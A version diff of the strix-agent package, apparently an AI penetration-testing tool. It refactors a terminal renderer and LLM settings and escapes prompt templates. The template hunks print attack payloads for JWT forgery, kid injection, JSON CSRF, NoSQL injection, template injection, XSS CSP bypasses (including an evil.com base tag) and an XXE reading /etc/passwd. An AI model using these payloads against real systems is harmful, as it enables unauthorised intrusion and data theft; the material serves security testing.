strix-agent 0.1.8__py3-none-any.whl → 0.1.10__py3-none-any.whl

strix/cli/tool_components/terminal_renderer.py

@@ -8,7 +8,7 @@ from .registry import register_tool_renderer
 
 @register_tool_renderer
 class TerminalRenderer(BaseToolRenderer):
-    tool_name: ClassVar[str] = "terminal_action"
+    tool_name: ClassVar[str] = "terminal_execute"
     css_classes: ClassVar[list[str]] = ["tool-call", "terminal-tool"]
 
     @classmethod
@@ -17,11 +17,12 @@ class TerminalRenderer(BaseToolRenderer):
         status = tool_data.get("status", "unknown")
         result = tool_data.get("result", {})
 
-        action = args.get("action", "unknown")
-        inputs = args.get("inputs", [])
+        command = args.get("command", "")
+        is_input = args.get("is_input", False)
         terminal_id = args.get("terminal_id", "default")
+        timeout = args.get("timeout")
 
-        content = cls._build_sleek_content(action, inputs, terminal_id, result)
+        content = cls._build_sleek_content(command, is_input, terminal_id, timeout, result)
 
         css_classes = cls.get_css_classes(status)
         return Static(content, classes=css_classes)
@@ -29,71 +30,102 @@ class TerminalRenderer(BaseToolRenderer):
     @classmethod
     def _build_sleek_content(
         cls,
-        action: str,
-        inputs: list[str],
+        command: str,
+        is_input: bool,
         terminal_id: str,  # noqa: ARG003
+        timeout: float | None,  # noqa: ARG003
         result: dict[str, Any],  # noqa: ARG003
     ) -> str:
         terminal_icon = ">_"
 
-        if action in {"create", "new_terminal"}:
-            command = cls._format_command(inputs) if inputs else "bash"
-            return f"{terminal_icon} [#22c55e]${command}[/]"
-
-        if action == "send_input":
-            command = cls._format_command(inputs)
-            return f"{terminal_icon} [#22c55e]${command}[/]"
-
-        if action == "wait":
-            return f"{terminal_icon} [dim]waiting...[/]"
-
-        if action == "close":
-            return f"{terminal_icon} [dim]close[/]"
-
-        if action == "get_snapshot":
-            return f"{terminal_icon} [dim]snapshot[/]"
-
-        return f"{terminal_icon} [dim]{action}[/]"
+        if not command.strip():
+            return f"{terminal_icon} [dim]getting logs...[/]"
+
+        control_sequences = {
+            "C-c",
+            "C-d",
+            "C-z",
+            "C-a",
+            "C-e",
+            "C-k",
+            "C-l",
+            "C-u",
+            "C-w",
+            "C-r",
+            "C-s",
+            "C-t",
+            "C-y",
+            "^c",
+            "^d",
+            "^z",
+            "^a",
+            "^e",
+            "^k",
+            "^l",
+            "^u",
+            "^w",
+            "^r",
+            "^s",
+            "^t",
+            "^y",
+        }
+        special_keys = {
+            "Enter",
+            "Escape",
+            "Space",
+            "Tab",
+            "BTab",
+            "BSpace",
+            "DC",
+            "IC",
+            "Up",
+            "Down",
+            "Left",
+            "Right",
+            "Home",
+            "End",
+            "PageUp",
+            "PageDown",
+            "PgUp",
+            "PgDn",
+            "PPage",
+            "NPage",
+            "F1",
+            "F2",
+            "F3",
+            "F4",
+            "F5",
+            "F6",
+            "F7",
+            "F8",
+            "F9",
+            "F10",
+            "F11",
+            "F12",
+        }
+
+        is_special = (
+            command in control_sequences
+            or command in special_keys
+            or command.startswith(("M-", "S-", "C-S-", "C-M-", "S-M-"))
+        )
+
+        if is_special:
+            return f"{terminal_icon} [#ef4444]{command}[/]"
+
+        if is_input:
+            formatted_command = cls._format_command_display(command)
+            return f"{terminal_icon} [#3b82f6]>>>[/] [#22c55e]{formatted_command}[/]"
+
+        formatted_command = cls._format_command_display(command)
+        return f"{terminal_icon} [#22c55e]$ {formatted_command}[/]"
 
     @classmethod
-    def _format_command(cls, inputs: list[str]) -> str:
-        if not inputs:
+    def _format_command_display(cls, command: str) -> str:
+        if not command:
             return ""
 
-        command_parts = []
-
-        for input_item in inputs:
-            if input_item == "Enter":
-                break
-            if input_item.startswith("literal:"):
-                command_parts.append(input_item[8:])
-            elif input_item in [
-                "Space",
-                "Tab",
-                "Backspace",
-                "Up",
-                "Down",
-                "Left",
-                "Right",
-                "Home",
-                "End",
-                "PageUp",
-                "PageDown",
-                "Insert",
-                "Delete",
-                "Escape",
-            ] or input_item.startswith(("^", "C-", "S-", "A-", "F")):
-                if input_item == "Space":
-                    command_parts.append(" ")
-                elif input_item == "Tab":
-                    command_parts.append("\t")
-                continue
-            else:
-                command_parts.append(input_item)
-
-        command = "".join(command_parts).strip()
-
         if len(command) > 200:
             command = command[:197] + "..."
 
-        return cls.escape_markup(command) if command else "bash"
+        return cls.escape_markup(command)

strix/llm/config.py

@@ -9,7 +9,7 @@ class LLMConfig:
         enable_prompt_caching: bool = True,
         prompt_modules: list[str] | None = None,
     ):
-        self.model_name = model_name or os.getenv("STRIX_LLM", "anthropic/claude-opus-4-1-20250805")
+        self.model_name = model_name or os.getenv("STRIX_LLM", "openai/gpt-5")
 
         if not self.model_name:
             raise ValueError("STRIX_LLM environment variable must be set and not empty")

strix/llm/llm.py

@@ -28,6 +28,39 @@ api_key = os.getenv("LLM_API_KEY")
 if api_key:
     litellm.api_key = api_key
 
+MODELS_WITHOUT_STOP_WORDS = [
+    "gpt-5",
+    "gpt-5-mini",
+    "gpt-5-nano",
+    "o1-mini",
+    "o1-preview",
+    "o1",
+    "o1-2024-12-17",
+    "o3",
+    "o3-2025-04-16",
+    "o3-mini-2025-01-31",
+    "o3-mini",
+    "o4-mini",
+    "o4-mini-2025-04-16",
+    "grok-4-0709",
+]
+
+REASONING_EFFORT_SUPPORTED_MODELS = [
+    "gpt-5",
+    "gpt-5-mini",
+    "gpt-5-nano",
+    "o1-2024-12-17",
+    "o1",
+    "o3",
+    "o3-2025-04-16",
+    "o3-mini-2025-01-31",
+    "o3-mini",
+    "o4-mini",
+    "o4-mini-2025-04-16",
+    "gemini-2.5-flash",
+    "gemini-2.5-pro",
+]
+
 
 class StepRole(str, Enum):
     AGENT = "agent"
@@ -240,17 +273,48 @@ class LLM:
             "supported": supports_prompt_caching(self.config.model_name),
         }
 
+    def _should_include_stop_param(self) -> bool:
+        if not self.config.model_name:
+            return True
+
+        actual_model_name = self.config.model_name.split("/")[-1].lower()
+        model_name_lower = self.config.model_name.lower()
+
+        return not any(
+            actual_model_name == unsupported_model.lower()
+            or model_name_lower == unsupported_model.lower()
+            for unsupported_model in MODELS_WITHOUT_STOP_WORDS
+        )
+
+    def _should_include_reasoning_effort(self) -> bool:
+        if not self.config.model_name:
+            return False
+
+        actual_model_name = self.config.model_name.split("/")[-1].lower()
+        model_name_lower = self.config.model_name.lower()
+
+        return any(
+            actual_model_name == supported_model.lower()
+            or model_name_lower == supported_model.lower()
+            for supported_model in REASONING_EFFORT_SUPPORTED_MODELS
+        )
+
     async def _make_request(
         self,
         messages: list[dict[str, Any]],
     ) -> ModelResponse:
-        completion_args = {
+        completion_args: dict[str, Any] = {
             "model": self.config.model_name,
             "messages": messages,
             "temperature": self.config.temperature,
-            "stop": ["</function>"],
         }
 
+        if self._should_include_stop_param():
+            completion_args["stop"] = ["</function>"]
+
+        if self._should_include_reasoning_effort():
+            completion_args["reasoning_effort"] = "medium"
+
         queue = get_global_queue()
         response = await queue.make_request(completion_args)
 

strix/llm/memory_compressor.py

@@ -145,7 +145,7 @@ class MemoryCompressor:
         model_name: str | None = None,
     ):
         self.max_images = max_images
-        self.model_name = model_name or os.getenv("STRIX_LLM", "anthropic/claude-opus-4-1-20250805")
+        self.model_name = model_name or os.getenv("STRIX_LLM", "openai/gpt-5")
 
         if not self.model_name:
             raise ValueError("STRIX_LLM environment variable must be set and not empty")

strix/prompts/__init__.py

@@ -49,25 +49,21 @@ def generate_modules_description() -> str:
     if not available_modules:
         return "No prompt modules available"
 
-    description_parts = []
+    all_module_names = get_all_module_names()
 
-    for category, modules in available_modules.items():
-        modules_str = ", ".join(modules)
-        description_parts.append(f"{category} ({modules_str})")
+    if not all_module_names:
+        return "No prompt modules available"
+
+    sorted_modules = sorted(all_module_names)
+    modules_str = ", ".join(sorted_modules)
 
     description = (
-        f"List of prompt modules to load for this agent (max 3). "
-        f"Available modules: {', '.join(description_parts)}. "
+        f"List of prompt modules to load for this agent (max 3). Available modules: {modules_str}. "
     )
 
-    example_modules = []
-    for modules in available_modules.values():
-        example_modules.extend(modules[:2])
-        if len(example_modules) >= 2:
-            break
-
+    example_modules = sorted_modules[:2]
     if example_modules:
-        example = f"Example: {example_modules[:2]} for specialized agent"
+        example = f"Example: {', '.join(example_modules)} for specialized agent"
         description += example
 
     return description

strix/prompts/vulnerabilities/authentication_jwt.jinja

@@ -5,8 +5,8 @@
 
 <jwt_structure>
 header.payload.signature
-- Header: {"alg":"HS256","typ":"JWT"}
-- Payload: {"sub":"1234","name":"John","iat":1516239022}
+- Header: {% raw %}{"alg":"HS256","typ":"JWT"}{% endraw %}
+- Payload: {% raw %}{"sub":"1234","name":"John","iat":1516239022}{% endraw %}
 - Signature: HMACSHA256(base64UrlEncode(header) + "." + base64UrlEncode(payload), secret)
 </jwt_structure>
 
@@ -19,7 +19,7 @@ RS256 to HS256:
 </algorithm_confusion>
 
 <none_algorithm>
-- Set "alg": "none" in header
+- Set {% raw %}"alg": "none"{% endraw %} in header
 - Remove signature completely (keep the trailing dot)
 </none_algorithm>
 
@@ -28,16 +28,16 @@ Common secrets: 'secret', 'password', '123456', 'key', 'jwt_secret', 'your-256-b
 </weak_secrets>
 
 <kid_manipulation>
-- SQL Injection: "kid": "key' UNION SELECT 'secret'--"
-- Command injection: "kid": "|sleep 10"
-- Path traversal: "kid": "../../../../../../dev/null"
+- SQL Injection: {% raw %}"kid": "key' UNION SELECT 'secret'--"{% endraw %}
+- Command injection: {% raw %}"kid": "|sleep 10"{% endraw %}
+- Path traversal: {% raw %}"kid": "../../../../../../dev/null"{% endraw %}
 </kid_manipulation>
 </common_attacks>
 
 <advanced_techniques>
 <jwk_injection>
 Embed public key in token header:
-{"jwk": {"kty": "RSA", "n": "your-public-key-n", "e": "AQAB"}}
+{% raw %}{"jwk": {"kty": "RSA", "n": "your-public-key-n", "e": "AQAB"}}{% endraw %}
 </jwk_injection>
 
 <jku_manipulation>

strix/prompts/vulnerabilities/csrf.jinja

@@ -48,7 +48,7 @@ HTML form auto-submit:
 <json_csrf>
 For JSON endpoints:
 <form enctype="text/plain" action="https://target.com/api">
-  <input name='{"amount":1000,"to":"attacker","ignore":"' value='"}'>
+  <input name='{% raw %}{"amount":1000,"to":"attacker","ignore":"{% endraw %}' value='"}'>
 </form>
 </json_csrf>
 

strix/prompts/vulnerabilities/idor.jinja

@@ -15,7 +15,7 @@
 
 <advanced_enumeration>
 - Boundary values: 0, -1, null, empty string, max int
-- Different formats: {"id":123} vs {"id":"123"}
+- Different formats: {% raw %}{"id":123} vs {"id":"123"}{% endraw %}
 - ID patterns: increment, decrement, similar patterns
 - Wildcard testing: *, %, _, all
 - Array notation: id[]=123&id[]=456
@@ -51,7 +51,7 @@ for i in range(1, 10000):
 <type_confusion>
 - String where int expected: "123" vs 123
 - Array where single value expected: [123] vs 123
-- Object injection: {"id": {"$ne": null}}
+- Object injection: {% raw %}{"id": {"$ne": null}}{% endraw %}
 </type_confusion>
 </exploitation_techniques>
 
@@ -106,7 +106,7 @@ query { u1: user(id: 123) { data } u2: user(id: 456) { data } }
 
 <websocket_idor>
 Subscribe to other users' channels:
-{"subscribe": "user_456_notifications"}
+{% raw %}{"subscribe": "user_456_notifications"}{% endraw %}
 </websocket_idor>
 
 <file_path_idor>

strix/prompts/vulnerabilities/rce.jinja

@@ -94,7 +94,7 @@ ${IFS}id
 <polyglot_payloads>
 Works in multiple contexts:
 ;id;#' |id| #" |id| #
-${{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}
+{% raw %}${{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}{% endraw %}
 </polyglot_payloads>
 
 <blind_rce>

strix/prompts/vulnerabilities/sql_injection.jinja

@@ -152,9 +152,9 @@ PostgreSQL:
 
 <nosql_injection>
 <mongodb>
-{"username": {"$ne": null}, "password": {"$ne": null}}
-{"$where": "this.username == 'admin'"}
-{"username": {"$regex": "^admin"}}
+{% raw %}{"username": {"$ne": null}, "password": {"$ne": null}}{% endraw %}
+{% raw %}{"$where": "this.username == 'admin'"}{% endraw %}
+{% raw %}{"username": {"$regex": "^admin"}}{% endraw %}
 </mongodb>
 
 <graphql>

strix/prompts/vulnerabilities/xss.jinja

@@ -9,7 +9,7 @@
 - Headers: User-Agent, Referer, X-Forwarded-For
 - Cookies (if reflected)
 - File uploads (filename, metadata)
-- JSON endpoints: {"user":"<payload>"}
+- JSON endpoints: {% raw %}{"user":"<payload>"}{% endraw %}
 - postMessage handlers
 - DOM properties: location.hash, document.referrer
 - WebSocket messages
@@ -97,7 +97,7 @@ jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</
 
 <csp_bypasses>
 - JSONP endpoints: <script src="//site.com/jsonp?callback=alert">
-- AngularJS: {{constructor.constructor('alert(1)')()}}
+- AngularJS: {% raw %}{{constructor.constructor('alert(1)')()}}{% endraw %}
 - Script gadgets in allowed libraries
 - Base tag injection: <base href="//evil.com/">
 - Object/embed: <object data="data:text/html,<script>alert(1)</script>">
@@ -145,7 +145,7 @@ navigator.mediaDevices.getUserMedia({video:true}).then(s=>...)
 </markdown>
 
 <react_vue>
-- dangerouslySetInnerHTML={{__html: payload}}
+- dangerouslySetInnerHTML={% raw %}{{__html: payload}}{% endraw %}
 - v-html directive bypass
 </react_vue>
 

strix/prompts/vulnerabilities/xxe.jinja

@@ -91,7 +91,7 @@ evil.dtd:
 
 <specific_contexts>
 <json_xxe>
-{"name": "test", "content": "<?xml version='1.0'?><!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]><x>&xxe;</x>"}
+{% raw %}{"name": "test", "content": "<?xml version='1.0'?><!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]><x>&xxe;</x>"}{% endraw %}
 </json_xxe>
 
 <soap_xxe>